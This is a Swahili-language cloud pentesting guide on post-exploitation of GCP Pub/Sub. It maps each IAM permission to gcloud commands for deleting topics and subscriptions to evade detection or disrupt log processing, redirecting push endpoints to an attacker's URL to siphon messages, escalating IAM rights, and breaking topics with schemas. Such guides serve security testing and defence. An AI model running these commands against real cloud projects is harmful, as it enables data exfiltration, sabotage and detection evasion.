GCP - Pub/Sub Post Exploitation

Pub/Sub

Kwa maelezo zaidi kuhusu Pub/Sub angalia ukurasa ufuatao:

pubsub.topics.publish

Chapisha ujumbe katika mada, muhimu kwa kutuma data zisizotarajiwa na kuanzisha kazi zisizotarajiwa au kutumia udhaifu:

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

pubsub.topics.detachSubscription

Inatumika kuzuia usajili kupokea ujumbe, labda ili kuepuka kugundulika.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

pubsub.topics.delete

Inatumika kuzuia usajili kupokea ujumbe, labda ili kuepuka kugundulika. Inawezekana kufuta mada hata ikiwa na usajili ulioambatanishwa nayo.

gcloud pubsub topics delete <TOPIC NAME>

pubsub.topics.update

Tumia ruhusa hii kuboresha mipangilio fulani ya mada ili kuharibu, kama --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

pubsub.topics.setIamPolicy

Jipe ruhusa ya kufanya mashambulizi yoyote ya hapo awali.

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

Pata ujumbe wote katika seva ya wavuti:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Unda usajili na uitumie kuchota ujumbe:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

pubsub.subscriptions.delete

Kufuta usajili kunaweza kuwa na manufaa kuharibu mfumo wa usindikaji wa kumbukumbu au kitu kingine kama hicho:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

pubsub.subscriptions.update

Tumia ruhusa hii kuboresha mipangilio ili ujumbe uhifadhiwe mahali unapoweza kufikia (URL, Big Query table, Bucket) au tu kuharibu hiyo.

gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>

pubsub.subscriptions.setIamPolicy

Jipe ruhusa zinazohitajika ili kutekeleza mashambulizi yoyote yaliyotajwa hapo awali.

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

Shambulia muundo kwa mada ili ujumbe usifanye hivyo na kwa hivyo mada inaharibika. Ikiwa hakuna muundo, huenda ukahitaji kuunda mmoja.

{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

pubsub.schemas.delete

Hii inaweza kuonekana kama kufuta muundo ambapo utaweza kutuma ujumbe ambao haukidhi muundo. Hata hivyo, kwa kuwa muundo utaondolewa, hakuna ujumbe utakaoweza kuingia ndani ya mada. Hivyo hii ni HAIFAI:

gcloud pubsub schemas delete <SCHEMA NAME>

pubsub.schemas.setIamPolicy

Jipe ruhusa zinazohitajika kutekeleza mashambulizi yoyote yaliyotajwa hapo awali.

pubsub.snapshots.create, pubsub.snapshots.seek

Hii itaunda picha ya ujumbe wote ambao haujakubaliwa na kuwarudisha kwenye usajili. Si ya manufaa sana kwa mshambuliaji lakini hapa iko:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME